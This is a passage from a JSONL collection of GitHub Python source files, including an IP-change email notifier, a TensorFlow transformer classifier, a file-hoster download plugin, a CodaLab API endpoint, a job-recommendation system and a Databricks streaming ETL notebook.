del credential\n return (True, None)\n\nclass EventLogger(object):\n def __init__(self, name, opcode):\n ph = win32api.GetCurrentProcess()\n th = win32security.OpenProcessToken(ph, win32con.TOKEN_READ)\n self.__sid = win32security.GetTokenInformation(th, win32security.TokenUser)[0]\n self.__opcode = opcode\n self.applicationName = name\n\n def __report(self, eventID, message):\n win32evtlogutil.ReportEvent(self.applicationName, eventID, eventCategory = 5, \n eventType = REPORT_CONSTANT.EVENT_ID.get(eventID, 58799)[0], \n strings = message, data = \"Application\\0Data\".encode(\"ascii\"), sid = self.__sid)\n \n def log_write(self, eventID, message = \"\"):\n msg = REPORT_CONSTANT.EVENT_ID.get(eventID, 58799)[1]\n if(len(message)>0):\n msg += [message] if type(message)==str else message\n if(self.__opcode == False):\n print(msg)\n else:\n self.__report(eventID, msg)\n\nclass IpChangeNotifier():\n def __init__(self, opcode):\n self.__CONFIG = None\n self.__opcode = opcode\n self.__logger = EventLogger(self.__class__.__name__, self.__opcode)\n \n self.__transTable = {\n \"#{ip}\" : \"127.0.0.1\",\n \"#{time}\" : time.ctime()\n }\n self.__read_config()\n\n def __del__(self):\n del self.__logger\n # Sth to clear\n\n def __read_config(self):\n self.__CONFIG = copy.deepcopy(REPORT_CONSTANT.CONFIGURATION)\n if(os.path.exists(REPORT_CONSTANT.CONFIG_FILE_PATH)==False):\n with open(REPORT_CONSTANT.CONFIG_FILE_PATH, \"w\") as file:\n file.write(json.dumps(REPORT_CONSTANT.CONFIGURATION, indent=4))\n return\n try:\n with open(REPORT_CONSTANT.CONFIG_FILE_PATH, \"r\") as file:\n self.__CONFIG = json.load(file)\n self.__CONFIG[\"TIME_DELTA\"] = int(self.__CONFIG[\"TIME_DELTA\"])\n if(self.__CONFIG[\"TIME_DELTA\"] < 60):\n self.__CONFIG[\"TIME_DELTA\"] = 300\n except:\n return\n\n def __update_table(self, ip):\n self.__transTable.update({\"#{ip}\": ip})\n self.__transTable.update({\"#{time}\": time.ctime()})\n\n def get_ip_address(self):\n if(self.__CONFIG[\"IP_ADDR_PROVIDER_RESPONSE_TYPE\"].lower() == \"json\"): # e.g. https://api.ipify.org?format=json or http://jsonip.com etc..\n try:\n return (True, requests.get(self.__CONFIG[\"IP_ADDR_PROVIDER\"]).json()[self.__CONFIG[\"IP_ADDR_PROVIDER_IP_ATTR_NAME\"]])\n except Exception as e:\n return (False, e)\n elif(self.__CONFIG[\"IP_ADDR_PROVIDER_RESPONSE_TYPE\"].lower() == \"text\"): # e.g. https://api.ipify.org\n try:\n return (True, requests.get(self.__CONFIG[\"IP_ADDR_PROVIDER\"]).text)\n except Exception as e:\n return (False, e)\n return (False, 0)\n\n def write_form(self, sender, receiver, title, body):\n SecureMailSender.send_mail_s(sender, receiver, title, body)\n\n def register(self):\n if(os.path.exists(self.__CONFIG[\"SENDER_INFO_PATH\"]) == False):\n sender_info = dict.fromkeys(['mac','server','email','key','port'])\n sender_info.update({\"mac\": str(SecureMailSender.generate_host_id()).strip()})\n sender_info.update({\"email\": str(input(\"[1] Enter your email account:\\n\")).strip()})\n sender_info.update({\"key\": str(input(\"[2] Enter your app key to login your email account:\\n\")).strip()})\n sender_info.update({\"server\": str(input(\"[3] Enter your SMTP server:\\n\"))})\n u = str(input(\"[4] Enter SMTP server port:\\n\")).strip()\n sender_info.update({\"port\": int(u) if u.isdigit() and int(u) in range(1, 65536) else 587})\n SecureMailSender.encrypt_credential(self.__CONFIG[\"SENDER_INFO_PATH\"], \n SecureMailSender.build_credential_to_json(sender_info))\n self.__logger.log_write(58704, \"New sender is registered.\")\n print(\"[*] If you want to edit title and content, modify the config.conf file.\")\n if(os.path.exists(self.__CONFIG[\"TARGET_INFO_PATH\"]) == False):\n recv_info = dict.fromkeys(['mac','server','email','key','port'], ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH)))\n recv_info.update({\"email\": str(input(\"[1] Enter listener's email account:\\n\")).strip()})\n SecureMailSender.encrypt_credential(self.__CONFIG[\"TARGET_INFO_PATH\"], \n SecureMailSender.build_credential_to_json(recv_info))\n self.__logger.log_write(58704, \"New listener is registered.\")\n\n def begin(self):\n pattern = re.compile(\"|\".join(map(re.escape,self.__transTable.keys())))\n sender = \"\"\n receiver = \"\"\n current = \"\"\n\n while(True):\n ip = self.get_ip_address()\n if(ip[0] == False):\n message = \"[!] IP notifier is currently unable to obtain external IP addresses from [{0}]\\nReason: {1}\".format(self.__CONFIG[\"IP_ADDR_PROVIDER\"], str(ip[1]))\n self.__logger.log_write(58703, message)\n if(ip[1]==0):\n break\n time.sleep(self.__CONFIG[\"TIME_DELTA\"])\n\n if(ip[1] != current):\n try:\n sender = SecureMailSender.decrypt_credential(self.__CONFIG[\"SENDER_INFO_PATH\"])\n receiver = SecureMailSender.decrypt_credential(self.__CONFIG[\"TARGET_INFO_PATH\"])\n except:\n message = \"[!] Credentials are corrupted.\"\n self.write_form(sender, receiver, \"[!] Credentials are corrupted.\", message)\n self.__logger.log_write(58706, message)\n break\n \n current = ip[1]\n self.__update_table(ip[1])\n title = pattern.sub(lambda match: self.__transTable[match.group(0)], self.__CONFIG[\"TITLE\"])\n body = pattern.sub(lambda match: self.__transTable[match.group(0)], self.__CONFIG[\"MESSAGE\"])\n r, e = SecureMailSender.send_mail_s(sender, receiver, title, body)\n if(r == False and e == -1):\n message = \"[!] Credentials are corrupted.\"\n self.write_form(sender,receiver, \"[!] Credentials are corrupted.\", message)\n self.__logger.log_write(58706, message)\n break\n elif(r == False):\n message = \"[!] An error has occurred: {0}\".format(e)\n self.__logger.log_write(58799, message)\n else:\n self.__logger.log_write(58702)\n time.sleep(self.__CONFIG[\"TIME_DELTA\"])\n\n def loop(self):\n self.__logger.log_write(58701)\n self.register()\n self.begin()\n self.__logger.log_write(58705)\n \nif __name__ == \"__main__\":\n def signal_handler(signal, frame):\n sys.exit(0)\n signal.signal(signal.SIGINT, signal_handler)\n\n iNot = IpChangeNotifier(True)\n iNot.loop()\n sys.exit(0)\n","repo_name":"Gibartes/IPChangeNotifier","sub_path":"IPChangeNotifier.py","file_name":"IPChangeNotifier.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3556346175","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: wensong\n\nimport os\nimport sys\nimport tensorflow as tf\nfrom tf_base_classifier import TFBaseClassifier\nfrom layers.tf_embedding_layer import TFEmbeddingLayer\nfrom layers.tf_pos_encoding_layer import TFPosEncodingLayer\nfrom layers.tf_multihead_att_layer import TFMultiHeadAttLayer\nfrom layers.tf_feedforward_layer import TFFeedForwardLayer\nfrom layers.tf_classifier_layer import TFClassifierLayer\n\n\nclass TFTransformerClassifier(TFBaseClassifier):\n '''Multi-Head Attention分类器\n '''\n def __init__(self, flags):\n '''\n Args:\n flags: 全局参数,包含learning_rate、classifier_type等参数\n '''\n # 初始化基类\n TFBaseClassifier.__init__(self, flags)\n # 此分类器参数\n self.hidden_sizes = list(map(int, flags.hidden_sizes.split(\",\")))\n self.dropout_rate = 1.0 - self.flags.keep_prob\n if not self.flags.training:\n self.dropout_rate = 0.\n\n def build_model(self):\n '''构建模型\n '''\n embedding_layer = TFEmbeddingLayer(\n input_x=self.input_x,\n vocab_size=self.flags.vocab_size,\n emb_size=self.flags.emb_size,\n keep_prob=self.flags.keep_prob,\n training=self.flags.training,\n pretrain_word_vecs=self.pretrain_word_vecs).build()\n\n # add pos encoding\n embedding_layer += TFPosEncodingLayer(\n in_hidden=embedding_layer,\n max_seq_len=self.flags.max_seq_len).build()\n embedding_layer = tf.layers.dropout(embedding_layer,\n rate=self.dropout_rate,\n training=self.flags.training)\n # Transformer Blocks\n encoder = embedding_layer # [B, T, D]\n for i in range(self.flags.num_blocks):\n with tf.variable_scope(\"num_blocks_{}\".format(i),\n reuse=tf.AUTO_REUSE):\n # multihead attention\n encoder = TFMultiHeadAttLayer(queries=encoder,\n keys=encoder,\n dropout_rate=self.dropout_rate,\n training=self.flags.training,\n causality=False).build()\n\n # FFN\n encoder = TFFeedForwardLayer(\n in_hidden=encoder,\n num_units=[self.flags.hidden_size,\n self.flags.emb_size]).build()\n\n # mean or max pooling: [B, T, D] -> [B, D]\n encoder = tf.reduce_mean(encoder, axis=1)\n\n # [B, D] -> [B, cls_num]\n self.probability, self.logits, self.loss = TFClassifierLayer(\n training=self.flags.training,\n in_hidden=encoder,\n cls_num=self.flags.cls_num,\n cls_type=self.flags.cls_type,\n input_y=self.input_y,\n keep_prob=self.flags.keep_prob,\n l2_reg_lambda=self.flags.l2_reg_lambda).build()\n\n # 返回模型引用\n return self\n","repo_name":"snowhws/deeplearning","sub_path":"models/nlp/classification/tf_transformer_classifier.py","file_name":"tf_transformer_classifier.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"71792795130","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport yaml\nimport argparse\nimport sys\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert old poses to new motion format.')\n parser.add_argument('infile', nargs='?',\n help='input poses parameter file [default: stdin]',\n default='/dev/stdin')\n parser.add_argument('outfile', nargs='?',\n help='output poses parameter file [default: stdout]',\n default='/dev/stdout')\n\n args = parser.parse_args()\n\n with open(args.infile) as f:\n poses = yaml.load(f.read())\n\n if poses is None:\n print(\"uh oh, nothing could be read from the input :(\", file=sys.stderr)\n return\n\n for n, toplevel in poses.iteritems():\n if 'poses' not in toplevel:\n print(\"no poses to convert, I'm done here.\", file=sys.stderr)\n return\n if not 'motions' in toplevel:\n toplevel['motions'] = {}\n for pn, pose in toplevel['poses'].iteritems():\n print(\"converting pose '{}'\".format(pn), file=sys.stderr)\n joints, positions = [list(x) for x in zip(*pose.items())]\n points = {'positions': positions, 'time_from_start': 0.0}\n toplevel['motions'][pn] = {'joints': joints, 'points': [points]}\n del toplevel['poses']\n\n print(\"writing to output file\", file=sys.stderr)\n with open(args.outfile, \"w\") as f:\n yaml.dump(poses, f)\n print(\"finished! You're all set.\", file=sys.stderr)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pal-robotics/play_motion","sub_path":"play_motion/scripts/convert_poses.py","file_name":"convert_poses.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"39466347802","text":"#python libs\nimport logging\nlogger = logging.getLogger(__name__) #__name___ = nombre del modulo. logging.getLogger = Usa la misma instancia de clase (del starter.py).\n\n#Libs\nfrom core.plugins_core import PluginsCore\n\n\nBASE_URL = \"http://uploaded.to\"\nWAITING = 20\n\n\nclass PluginDownload(PluginsCore):\n def __init__(self, *args, **kwargs):\n PluginsCore.__init__(self, *args, **kwargs)\n\n def parse(self):\n link = self.link\n file_id = self.get_file_id()\n form_url = BASE_URL + \"/io/ticket/slot/\" + file_id\n page = self.get_page(form_url, form={})\n m = self.get_match('(succ:true)', page)\n if m is not None:\n page = self.get_page(link)\n self.countdown('period: (?P[^<]+)', page, 320, WAITING)\n js_url = BASE_URL + \"/js/download.js\"\n page = self.get_page(js_url)\n c_pattern = 'Recaptcha\\.create\\(.*?\"(?P[^\"]+)'\n self.next_link = BASE_URL + \"/io/ticket/captcha/\" + file_id\n page = self.recaptcha(c_pattern, page)\n #resume fix\n self.content_range = None\n self.source = self.click('url:\\'(?P[^\\']+)', page, False)\n else: #link not found\n pass\n\n def recaptcha_post(self, pattern, page, challenge, response, extra_fields=None):\n #overrided method\n form_list = [(\"recaptcha_challenge_field\", challenge), (\"recaptcha_response_field\", response)]\n if extra_fields:\n form_list.extend(extra_fields)\n page = self.get_page(self.next_link, form_list, page)\n if \"Sie haben die max.\" in page:\n self.err_msg = \"Limit Exceeded\"\n self.limit_exceeded = True\n return (\"Limit Exceeded\", page)\n elif \"download\" in page:\n return (None, page)\n else: #{err:\"captcha\"}\n return (\"Wrong captcha\", page)\n\n def get_file_id(self):\n if \"/ul.to/\" in self.link:\n file_id = self.link.split(\"/ul.to/\")[-1].split(\"/\")[0]\n else:\n file_id = self.link.split(\"/file/\")[-1].split(\"/\")[0]\n return file_id","repo_name":"yckart/ochDownloader","sub_path":"plugins/uploaded/anonym_download.py","file_name":"anonym_download.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15795364547","text":"from aws_cdk import (\n core,\n aws_lambda as _lambda\n)\nimport os\n\n# lambdaで実行するメソッドの定義\nFUNC = \"\"\"\nimport time\nfrom random import choice, randint\ndef handler(event, context):\n time.sleep(randint(2,5))\n pokemon = [\"ヒトカゲ\", \"ゼニガメ\", \"フシギダネ\"]\n message = \"オーキド博士> Congratulations! You are given \" + choice(pokemon)\n print(message)\n return message\n\"\"\"\n\nclass SimpleLambda(core.Stack):\n\n def __init__(self, scope: core.App, name: str, **kargs) -> None:\n super().__init__(scope, name, **kargs)\n\n # lambda handler の設定\n handler = _lambda.Function(\n self, 'SimpleLambdaHandler',\n runtime=_lambda.Runtime.PYTHON_3_7, # python3.7 の環境で実施\n code=_lambda.Code.from_inline(FUNC), # 実行されるべき関数が書かれたコードを指定。文字列の他にファイルも指定可能\n handler='index.handler', # index.`handler`関数をメイン関数として実行する。 handlerを変更したら他のメソッドを実行する\n memory_size=128, # 最大メモリサイズ\n timeout=core.Duration.seconds(10), # タイムアウトまでの時間\n dead_letter_queue_enabled=True\n )\n","repo_name":"s14t284/intro-aws","sub_path":"ch11/lambdafn/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71434473850","text":"import os\nimport torch.utils.data\n\n\n### CODE FROM https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/trainer.py\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pt'):\n torch.save(state, filename)\n \nclass AverageMeter(object):\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n# https://github.com/peterliht/knowledge-distillation-pytorch/blob/ef06124d67a98abcb3a5bc9c81f7d0f1f016a7ef/utils.py#L141\ndef load_checkpoint(checkpoint, model, optimizer=None):\n if not os.path.exists(checkpoint):\n raise(\"File doesn't exist {}\".format(checkpoint))\n if torch.cuda.is_available():\n checkpoint = torch.load(checkpoint)\n else:\n checkpoint = torch.load(checkpoint, map_location=lambda storage, loc: storage)\n\n model.load_state_dict(checkpoint['state_dict'])\n\n if optimizer:\n optimizer.load_state_dict(checkpoint['optim_dict'])\n\n return checkpoint","repo_name":"LEEYEONSU/pytorch--Knowledge_Distillation","sub_path":"utils/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34554851698","text":"from bottle import local, post, request\n\nfrom codalab.common import UsageError, precondition\nfrom codalab.lib.bundle_action import BundleAction\nfrom codalab.objects.permission import check_bundles_have_all_permission\nfrom codalab.rest.schemas import BundleActionSchema\nfrom codalab.server.authenticated_plugin import AuthenticatedProtectedPlugin\nfrom codalab.worker.bundle_state import State\n\n\n@post('/bundle-actions', apply=AuthenticatedProtectedPlugin())\ndef create_bundle_actions():\n \"\"\"\n Sends the message to the worker to do the bundle action, and adds the\n action string to the bundle metadata.\n \"\"\"\n actions = BundleActionSchema(strict=True, many=True).load(request.json).data\n\n check_bundles_have_all_permission(local.model, request.user, [a['uuid'] for a in actions])\n for action in actions:\n bundle = local.model.get_bundle(action['uuid'])\n if bundle.state in [State.READY, State.FAILED, State.KILLED]:\n raise UsageError(\n 'Cannot execute this action on a bundle that is in the following states: ready, failed, killed. '\n 'Kill action can be executed on bundles in created, uploading, staged, making, starting, '\n 'running, preparing, or finalizing state.'\n )\n\n worker = local.model.get_bundle_worker(action['uuid'])\n new_actions = getattr(bundle.metadata, 'actions', []) + [BundleAction.as_string(action)]\n\n # The state updates of bundles in PREPARING, RUNNING, or FINALIZING state will be handled on the worker side.\n if worker:\n precondition(\n local.worker_model.send_json_message(\n worker['socket_id'], worker['worker_id'], action, 60\n ),\n 'Unable to reach worker.',\n )\n local.model.update_bundle(bundle, {'metadata': {'actions': new_actions}})\n else:\n # The state updates of bundles in CREATED, UPLOADING, MAKING, STARTING or STAGED state\n # will be handled on the rest-server side.\n local.model.update_bundle(\n bundle, {'state': State.KILLED, 'metadata': {'actions': new_actions}}\n )\n\n return BundleActionSchema(many=True).dump(actions).data\n","repo_name":"codalab/codalab-worksheets","sub_path":"codalab/rest/bundle_actions.py","file_name":"bundle_actions.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"15303374427","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom tp3_exo1 import *\r\n\r\n\r\ndef normal(vtx, elt, b):\r\n (eltb, be2e) = b\r\n X = list()\r\n Y = list()\r\n U = list()\r\n V = list()\r\n z = np.array([0, 0, 1])\r\n i = 0\r\n for bi in eltb:\r\n k = be2e[i]%3\r\n j = 0\r\n v3= elt[k][j]\r\n \r\n while(v3 in bi):\r\n v3 = elt[k][j]\r\n j = j + 1\r\n \r\n [v1, v2] = bi\r\n [x1, y1] = vtx[v1] \r\n [x2, y2] = vtx[v2]\r\n a= np.array([x1 - x2, y1 - y2, 0])\r\n n = np.cross(a, z)\r\n g1 = (x1 + x2)/2 - vtx[v3][0]\r\n g2 = (y1 + y2)/2 - vtx[v3][1]\r\n X.append((x1 + x2)/2 )\r\n Y.append((y1 + y2)/2 )\r\n \r\n if k%3 == 2:#(np.sign(g1) >=np.sign(n[0]) and np.sign(g2) >=np.sign(n[1])):\r\n U.append(n[0])\r\n V.append(n[1])\r\n else:\r\n # U.append(n[0]*-1)\r\n U.append(0)\r\n # V.append(n[1]*-1)\r\n V.append(0)\r\n print(U[i], V[i], X[i], Y[i], k)\r\n i = i + 1\r\n plt.quiver(X, Y, U, V)\r\n PlotMesh(vtx, elt, eltb=eltb)\r\n \r\n \r\n \r\nfilename = \"maillage2.msh\"\r\nvtx = loadVTX(filename)\r\nelt = loadELT(filename)\r\n\r\n# vtx = [[0., 0, ], [1., 0.], [0.5, 0.5], [0., 1.], [1., 1.]]\r\n# elt = [[0, 1, 2], [1, 2, 4], [2, 3, 4], [0, 2, 3]]\r\nb = Boundary(elt)\r\n\r\n# PlotMesh(vtx, elt, eltb=eltb)\r\nnormal(vtx, elt, b)","repo_name":"AnatoleVercelloni/all","sub_path":"M1/edp/projet/tp6_exo1.py","file_name":"tp6_exo1.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31973024619","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom gensim.similarities import WmdSimilarity\nfrom gensim import models as gsm\nfrom time import time\nfrom tqdm import tqdm\nimport pickle\nfrom DataPreparation.Preprocessing import preprocessingCvsPhrases, preprocessingJobsPhrases\n\nclass RecommendationWord2vecPhrases():\n \n def __init__(self, dataPrepFile, dataCvsFile, out):\n self.dataPrepFile = dataPrepFile\n self.dataCvsFile = dataCvsFile\n #n = cvs.shape[0] - 1\n self.n = 50\n self.out = out\n \n \n # Generating recommendations skip-gram\n def recommendation(self,cvs,vagas_ti,vagas_ids,num_best, instance, model):\n \n df_final = pd.DataFrame(columns=[\"exp\",\"edu\",\"hab\",\"v_tit\",\"v_desc\",\"sim\"])\n for j in tqdm(range(self.n)):\n df_aux = pd.DataFrame()\n #index = np.random.randint(n)\n query = cvs[\"all\"][j]\n sims = instance[query] \n aux_sims = []\n aux_vids = []\n for i in range(num_best):\n aux_sims.append(round(sims[i][1],4))\n aux_vids.append(vagas_ids[sims[i][0]]) \n aux_exp = [\"the same\"] * num_best\n aux_edu = [\"the same\"] * num_best\n aux_hab = [\"the same\"] * num_best\n aux_exp[0] = cvs.iloc[j][\"experiencia\"]\n aux_edu[0] = cvs.iloc[j][\"educacao\"]\n aux_hab[0] = cvs.iloc[j][\"hab_cmp\"]\n df_aux[\"exp\"] = pd.Series(aux_exp) \n df_aux[\"edu\"] = pd.Series(aux_edu) \n df_aux[\"hab\"] = pd.Series(aux_hab) \n df_aux[\"v_tit\"] = vagas_ti[vagas_ti.id.isin(aux_vids)][\"titulo\"].values \n df_aux[\"v_desc\"] = vagas_ti[vagas_ti.id.isin(aux_vids)][\"descricao\"].values\n df_aux[\"sim\"] = pd.Series(aux_sims)\n df_final = pd.concat([df_final,df_aux], axis=0)\n df_final.to_csv(self.out+\"recommendations/recomendacoes_finais_phrases_\"+model+\".csv\")\n print(\"Recommendation \"+model+\" done!\")\n \n \n def main(self): \n \n print(\"Recommendation using Embeddings-Phrases\")\n \n # Loading preprocessed data\n vagas_ti = pd.read_csv(self.dataPrepFile)\n \n # Loading cvs data\n cvs = pd.read_csv(self.dataCvsFile)\n \n # Loading bigram and trigrams\n bigram = pickle.load(open(self.out+\"wordEmbeddings/vagas_cv.bigram\",\"rb\"))\n trigram = pickle.load(open(self.out+\"wordEmbeddings/vagas_cv.trigram\",\"rb\"))\n \n # Preprocessing cvs\n cvs = preprocessingCvsPhrases(cvs, bigram, trigram, self.out)\n \n # Preprocessing job offers\n vagas_skills, vagas_ids = preprocessingJobsPhrases(vagas_ti, bigram, trigram, self.out)\n \n # Loading model\n model_skill_skg = gsm.Word2Vec.load(self.out+\"wordEmbeddings/ti_skill_phrases_skg.model\")\n model_skill_cbow = gsm.Word2Vec.load(self.out+\"wordEmbeddings/ti_skill_phrases_cbow.model\")\n \n # Using similarity framework for Word Mover's Distance (WMD)\n num_best = 10\n start = time()\n #Normalizing word2vec vectors\n model_skill_skg.init_sims(replace=True)\n instance_skg = WmdSimilarity(vagas_skills, model_skill_skg, num_best=num_best)\n print(\"Time: %.4f\" %(time()-start))\n \n start = time()\n model_skill_cbow.init_sims(replace=True)\n instance_cbow = WmdSimilarity(vagas_skills, model_skill_cbow, num_best=num_best)\n print(\"Time: %.4f\" %(time()-start))\n \n self.recommendation(cvs, vagas_ti, vagas_ids, num_best, instance_skg, \"skg\")\n self.recommendation(cvs, vagas_ti, vagas_ids, num_best, instance_cbow, \"cbow\")\n \n print(\"Recommendation using Embeddings-Phrases done!\")\n \n","repo_name":"visibilia/JobRecommender","sub_path":"Recommendation/RecommendationW2vecPhrases.py","file_name":"RecommendationW2vecPhrases.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"35024864588","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Import common variables & functions\n\n# COMMAND ----------\n\n# MAGIC %run ../utils/setup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Setup Notebook widgets which are also parameters\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"triggerOnce\", \"true\")\n\n# COMMAND ----------\n\ntriggerOnce = dbutils.widgets.getArgument(\"triggerOnce\")\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom delta.tables import *\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Read incoming Bronze data as a stream. We know it's append only so we can just read as a standard append only stream and don't need to read as a CDF stream\n\n# COMMAND ----------\n\nbronzeInsuranceClaimsDf = spark.readStream.format(\"delta\").table(f\"{database_name}.insurance_claims_bronze\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Since we are ingesting into Silver we will be doing Delta MERGE using foreachBatch() Structured Streaming feature.\n# MAGIC ### This function is doing the actual microbatch batch MERGE and is called by Structured Streaming framework.\n# MAGIC ### We do a merge by primary keys policy_number, property_claim, injury_claim, vehicle_claim. Matching rows are updated and non-matching rows are inserted.\n\n# COMMAND ----------\n\ndef upsertToSilver(batchDf, batchId):\n deltaTable = DeltaTable.forName(spark, f'{database_name}.insurance_claims_silver')\n source = batchDf\n deltaTable.alias(\"u\").merge(\n source = source.alias(\"staged_updates\"),\n condition = expr(\"u.policy_number = staged_updates.policy_number AND u.property_claim = staged_updates.property_claim AND u.injury_claim = staged_updates.injury_claim AND u.vehicle_claim = staged_updates.vehicle_claim\")\n ).whenMatchedUpdateAll() \\\n .whenNotMatchedInsertAll() \\\n .execute()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### The writeStream() code below performs ingest into Silver.\n# MAGIC ### We perform some simple transforms to convert field values to more appriate data types.\n# MAGIC ### This is where you would do your tranform and MERGE before writing to Silver.\n\n# COMMAND ----------\n\nquery = bronzeInsuranceClaimsDf \\\n .selectExpr([\n \"custom_to_date(date_of_birth, '%d/%m/%y') as date_of_birth\",\n \"cast(policy_number as int) as policy_number\",\n \"custom_to_date(policy_bind_date, '%d/%m/%y') as policy_bind_date\",\n \"policy_state\",\n \"policy_csl\",\n \"policy_deductible\",\n \"cast(policy_annual_premium as double) as policy_annual_premium\",\n \"cast(umbrella_limit as int) as umbrella_limit\",\n \"cast(insured_zip as int) as insured_zip\",\n \"insured_sex\",\n \"insured_education_level\",\n \"insured_occupation\",\n \"insured_hobbies\",\n \"insured_relationship\",\n \"cast(capital_gains as int) as capital_gains\",\n \"cast(capital_loss as int) as capital_loss\",\n \"custom_to_date(incident_date, '%d/%m/%y') as incident_date\",\n \"incident_type\",\n \"collision_type\",\n \"incident_severity\",\n \"authorities_contacted\",\n \"incident_state\",\n \"incident_city\",\n \"incident_location\",\n \"cast(incident_hour_of_the_day as int) as incident_hour_of_the_day\",\n \"cast(number_of_vehicles_involved as int) as number_of_vehicles_involved\",\n \"property_damage\",\n \"cast(bodily_injuries as int) as bodily_injuries\",\n \"cast(witnesses as int) as witnesses\",\n \"police_report_available\",\n \"cast(total_claim_amount as int) as total_claim_amount\",\n \"cast(injury_claim as int) as injury_claim\",\n \"cast(property_claim as int) as property_claim\",\n \"cast(vehicle_claim as int) as vehicle_claim\",\n \"auto_make\",\n \"auto_model\",\n \"cast(auto_year as int) as auto_year\"\n ]) \\\n .writeStream.format(\"delta\") \\\n .foreachBatch(upsertToSilver) \\\n .option('checkpointLocation', f'{checkpointLocation}/insurance_claims_silver')\n\nif triggerOnce=='true':\n query = query.trigger(once=True)\n\nquery.start()\n\n# COMMAND ----------\n\n#display(spark.sql(f'SELECT * FROM {database_name}.insurance_claims_silver'))\n","repo_name":"LeoneGarage/AWS-ISV-Summit","sub_path":"ingestion/10_etl_streaming_silver.py","file_name":"10_etl_streaming_silver.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"24918045013","text":"from math import *\n#insert MergeSort\ndef sortmethod(lista,celda,indiceinicial=0):\n \n n=len(lista)\n if celda.tiempo<=lista[0].tiempo:\n return (indiceinicial)\n elif celda.tiempo>=lista[n-1].tiempo:\n indiceinicial=n+indiceinicial\n return (indiceinicial)\n else:\n #reducir tamaño de la lista en cuatro\n listareduced=lista[1:len(lista)-1]\n indiceinicial+=1\n division=len(listareduced)//4\n #Vamos a formar las 4 listas\n #cuadrante F->entra en el primero , T entra en el segudno\n if celda.tiempo0:\n \n indexcuadrante1=indiceinicial\n inicio=cuadrante1[0].tiempo\n fin=cuadrante1[len(cuadrante1)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n if len(cuadrante1)>=30000:\n indiceinicial=sortmethod(cuadrante1,celda,indexcuadrante1)\n else:\n indiceinicial=mergesort(cuadrante1,celda,indexcuadrante1)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n indiceinicial=indexcuadrante1\n return (indiceinicial)\n\n cuadrante2=listareduced[division:division*2]\n if len(cuadrante2)>0:\n indexcuadrante2=indexcuadrante1+len(cuadrante1)\n inicio=cuadrante2[0].tiempo\n fin=cuadrante2[len(cuadrante2)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n if len(cuadrante2)>=30000:\n indiceinicial=sortmethod(cuadrante2,celda,indexcuadrante2)\n else:\n indiceinicial=mergesort(cuadrante2,celda,indexcuadrante2)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n indiceinicial=indexcuadrante2\n return (indiceinicial)\n elif celda.tiempo>fin:\n indiceinicial=indiceinicial+(division*2)\n return (indiceinicial)\n else:\n \n cuadrante3=listareduced[division*2:division*3]\n if len(cuadrante3)>0:\n # indexcuadrante3=indexcuadrante2+len(cuadrante2)\n indexcuadrante3=(division*2)+1\n inicio=cuadrante3[0].tiempo\n fin=cuadrante3[len(cuadrante3)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n if len(cuadrante3)>=30000:\n indiceinicial=sortmethod(cuadrante3,celda,indexcuadrante3)\n else:\n indiceinicial=mergesort(cuadrante3,celda,indexcuadrante3)\n return (indiceinicial)\n elif 